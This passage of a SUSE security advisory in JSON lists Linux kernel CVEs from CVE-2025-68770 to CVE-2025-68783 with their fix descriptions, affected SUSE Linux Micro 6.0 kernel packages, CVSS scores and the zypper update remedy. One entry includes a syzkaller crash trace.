"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
